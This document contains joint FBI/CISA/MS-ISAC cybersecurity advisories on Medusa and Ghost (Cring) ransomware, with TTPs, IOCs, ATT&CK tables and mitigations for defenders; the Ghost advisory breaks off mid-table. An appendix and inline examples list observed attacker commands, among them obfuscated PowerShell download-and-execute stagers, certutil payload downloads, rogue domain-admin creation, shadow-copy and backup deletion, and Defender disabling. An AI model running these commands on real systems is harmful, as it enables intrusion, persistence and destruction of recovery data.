Home Page | CISA
Summary Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025. Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation. FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents. Download the PDF version of this report: For a downloadable list of IOCs, see: AA25-071A STIX XML (XML, 34.30 KB ) AA25-071A STIX JSON (JSON, 42.28 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. Background The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid. Initial Access Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as: Phishing campaigns as a primary method for stealing victim credentials [T1566]. Exploitation of unpatched software vulnerabilities [T1190] through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and Fortinet EMS SQL injection vulnerability [CVE-2023-48788 [CWE 89: SQL Injection]. Discovery Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include: 21 (FTP) 22 (SSH) 23 (Telnet) 80 (HTTP) 115 (SFTP) 443 (HTTPS) 1433 (SQL database) 3050 (Firebird database) 3128 (HTTP web proxy) 3306 (MySQL database) 3389 (RDP) Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information. Defense Evasion Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress. Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003]. In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings. powershell -exec bypass -enc In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027]. powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http:///.msi) In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format operator (-f) followed by three arguments to specify character replacements in the base64 payload. powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'','', '')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) The obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell. In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001]. FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection: Ligolo. A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine. Cloudflared. Formerly known as ArgoTunnel. Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly. Lateral Movement and Execution Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to: Copy (-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s). Execute an already existing local file on a remote machine with SYSTEM level privileges. Execute remote shell commands using cmd /c. One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389: netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow Then, a rule to allow remote WMI connections is created: netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes Finally, the registry is modified to allow Remote Desktop connections: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Mimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement. Exfiltration and Encryption Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070]. Extortion Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer. FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme. Indicators of Compromise Table 1 lists the hashes of malicious files obtained during investigations. Table 1: Malicious Files Files Hash (MD5) Description !!!READ_ME_MEDUSA!!!.txt Redacted Ransom note file openrdp.bat 44370f5c977e415981febf7dbb87a85c Allows incoming RDP and remote WMI connections pu.exe 80d852cd199ac923205b61658a9ec5bc Reverse shell Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors. Table 2: Medusa Email Addresses Email Addresses Description key.medusa.serviceteam@protonmail.com Used for ransom negotiation medusa.support@onionmail.org Used for ransom negotiation mds.svt.breach@protonmail.com Used for ransom negotiation mds.svt.mir2@protonmail.com Used for ransom negotiation MedusaSupport@cock.li Used for ransom negotiation MITRE ATT&CK Tactics and Techniques See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 3: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures. Initial Access TA0001 Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access. Phishing T1566 Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims. Table 4: Defense Evasion Technique Title ID Use Indicator Removal: Clear Command History T1070.003 Medusa actors attempt to cover their tracks by deleting the PowerShell command line history. Obfuscated Files or Information: Encrypted/Encoded File T1027.013 Medusa actors use a well-known evasion technique that executes a base64 encrypted command. Obfuscated Files or Information T1027 Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable. Indicator Removal T1070 Medusa actors deleted their previous work and tools installed. Impair Defenses: Disable or Modify Tools T1562.001 Medusa actors killed or deleted endpoint detection and response tools. Table 5: Discovery Technique Title ID Use Network Service Discovery T1046 Medusa actors utilized living of the land techniques to perform network enumeration. File and Directory Discovery T1083 Medusa actors utilized Windows Command Prompt for filesystem enumeration. Network Share Discovery T1135 Medusa actors queried shared drives on the local system to gather sources of information. System Network Configuration Discovery T1016 Medusa actors used operating system administrative utilities to gather network information. System Information Discovery T1082 Medusa actors used the command systeminfo to gather detailed system information. Permission Groups Discovery: Domain Groups T1069.002 Medusa actors attempt to find domain-level group and permission settings. Table 6: Credential Access Technique Title ID Use Credential Access TA0006 Medusa actors harvest credentials with tools like Mimikatz to gain access to systems. OS Credential Dumping: LSASS Memory T1003.001 Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz. Table 7: Lateral Movement and Execution Technique Title ID Use Lateral Movement TA0008 Medusa actors performed techniques to move laterally without detection once they gained initial access. Command and Scripting Interpreter: PowerShell T1059.001 Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration. Command and Scripting Interpreter: Windows Command Shell T1059.003 Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration. Software Deployment Tools T1072 Medusa Actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network. Remote Services: Remote Desktop Protocol T1021.001 Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally. System Services T1569.002 Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network. Windows Management Instrumentation T1047 Medusa actors abused Windows Management Instrumentation to query system information. Table 8: Exfiltration and Encryption Technique Title ID Use Exfiltration TA0010 Medusa actors identified files to exfiltrate out of victim networks. Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers. Table 9: Command and Control Technique Title ID Use Ingress Tool Transfer T1105 Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress. Application Layer Protocol: Web Protocols T1071.001 Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port 443: HTTPS. Remote Access Software T1219 Medusa actors used remote access software to move laterally through the network. Table 10: Persistence Technique Title ID Use Create Account T1136.002 Medusa actors created a domain account to maintain access to victim systems. Table 11: Impact Technique Title ID Use Data Encrypted for Impact T1486 Medusa identified and encrypted data on target systems to interrupt availability to system and network resources. Inhibit System Recovery T1490 The process gaze.exe terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note. Financial Theft T1657 Victims must pay to decrypt files and prevent further release by Medusa actors. System Shutdown/Reboot T1529 Medusa actors manually turned off and encrypted virtual machines. Service Stop T1489 The process gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites, Mitigations FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S]. Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring frequently recurring password changes, as these can weaken security [CPG 2.C]. Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H]. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A]. Require VPNs or Jump Hosts for remote access. Monitor for unauthorized scanning and access attempts. Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence. Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E]. Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O]. Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N]. Disable unused ports[CPG 2.V]. Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted and/or only have irretrievable data. Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. Validate Security Controls In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (Table 3 to Table 11). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Resources Joint #StopRansomware Guide. Joint Guide Identifying and Mitigating Living Off the Land Techniques. Joint Guide to Securing Remote Access Software. Reporting Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws. FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). Disclaimer The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC. Acknowledgements ConnectWise contributed to this advisory. Version History March 12, 2025: Initial version. Appendix A: Medusa Commands These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms. cmd.exe /c certutil -f urlcache https:///.css .dll cmd.exe /c certutil -f urlcache https:///.msi .msi cmd.exe /c driverquery cmd.exe /c echo Computer: %COMPUTERNAME% & ` echo Username: %USERNAME% & ` echo Domain: %USERDOMAIN% & ` echo Logon Server: %LOGONSERVER% & ` echo DNS Domain: %USERDNSDOMAIN% & ` echo User Profile: %USERPROFILE% & echo ` System Root: %SYSTEMROOT% cmd.exe /c ipconfig /all [T1016] cmd.exe /c net share [T1135] cmd.exe /c net use cmd.exe /c netstat -a cmd.exe /c sc query cmd.exe /c schtasks cmd.exe /c systeminfo [T1082] cmd.exe /c ver cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname cmd.exe /c wmic printjob mmc.exe compmgmt.msc /computer:{hostname/ip} mstsc.exe /v:{hostname/ip} mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass} powershell -exec bypass -enc powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http:///.msi) powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'', '','')))), [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) powershell Remove-Item (Get-PSReadlineOption).HistorySavePath powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate, logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path -NoTypeInformation -Encoding UTF8 psexec.exe -accepteula -nobanner -s \\{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe" psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe && c:\gaze.exe" psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat nltest /dclist: net group "domain admins" /domain [T1069.002] net group "Domain Admins" default /add /domain net group "Enterprise Admins" default /add /domain net group "Remote Desktop Users" default /add /domain net group "Group Policy Creator Owners" default /add /domain net group "Schema Admins" default /add /domain net group "domain users" /domain net user default /active:yes /domain net user /add default /domain [T1136.002] query user reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 systeminfo vssadmin.exe Delete Shadows /all /quiet vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Summary Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025. Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses. Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied. The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents. Download the PDF version of this report: AA25-050A #StopRansomware: Ghost (Cring) Ransomware (PDF, 735.18 KB ) For a downloadable copy of IOCs, see: AA25-050A STIX XML (XML, 78.67 KB ) AA25-050A STIX XML (Additional IOCs) (XML, 74.01 KB ) AA25-050A STIX JSON (JSON, 68.47 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16.1. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. Initial Access The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [T1190]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207— commonly referred to as the ProxyShell attack chain). Execution Ghost actors have been observed uploading a web shell [T1505.003] to a compromised server and leveraging Windows Command Prompt [T1059.003] and/or PowerShell [T1059.001] to download and execute Cobalt Strike Beacon malware [T1105] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls. Persistence Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [T1136.001] and domain accounts [T1136.002] and change passwords for existing accounts [T1098]. In 2024, Ghost actors were observed deploying web shells [T1505.003] on victim web servers. Privilege Escalation Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [T1134.001]. Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [T1068] such as “SharpZeroLogon,” “SharpGPPPass,” “BadPotato,” and “GodPotato.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials. See Table 1 for a descriptive listing of tools. Credential Access Ghost actors use the built in Cobalt Strike function “hashdump” or Mimikatz [T1003] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices. Defense Evasion Ghost actors used their access through Cobalt Strike to display a list of running processes [T1057] to determine which antivirus software [T1518.001] is running so that it can be disabled [T1562.001]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are: Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend. Discovery Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [T1087.002], open-source tools such as “SharpShares” for network share discovery [T1135], and “Ladon 911” and “SharpNBTScan” for remote systems discovery [T1018]. Network administrators would be unlikely to use these tools for network share or remote systems discovery. Lateral Movement Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [T1047] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA… [T1132.001][T1564.003]. This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine. In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim. Exfiltration Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked. The FBI has observed limited downloading of data to Cobalt Strike Team Servers [T1041]. Victims and other trusted third parties have reported limited uses of Mega.nz [T1567.002] and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data. Command and Control Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [T1071.001]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address. For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [T1573] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence. Note: Table 2 contains a list of Ghost ransom email addresses. Impact and Encryption Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [T1486]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable. These ransomware payloads clear Windows Event Logs [T1070.001], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [T1490]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [T1486]. The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices. Indicators of Compromise (IOC) Table 1 lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further. Note: Authors of these tools generally state that they should not be used in illegal activity. Table 1: Tools Leveraged by Ghost Actors Name Description Source Cobalt Strike Cobalt Strike is penetration testing software. Ghost actors use an unauthorized version of Cobalt Strike. N/A IOX Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device. github[.]com/EddieIvan01/iox SharpShares.exe SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery. github[.]com/mitchmoser/SharpShares SharpZeroLogon.exe SharpZeroLogon.exe attempts to exploit CVE-2020-1472 and is run against a target Domain Controller. github[.]com/leitosama/SharpZeroLogon SharpGPPPass.exe SharpGPPPass.exe attempts to exploit CVE-2014-1812 and targets XML files created through Group Policy Preferences that may contain passwords. N/A SpnDump.exe SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration. N/A NBT.exe A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and 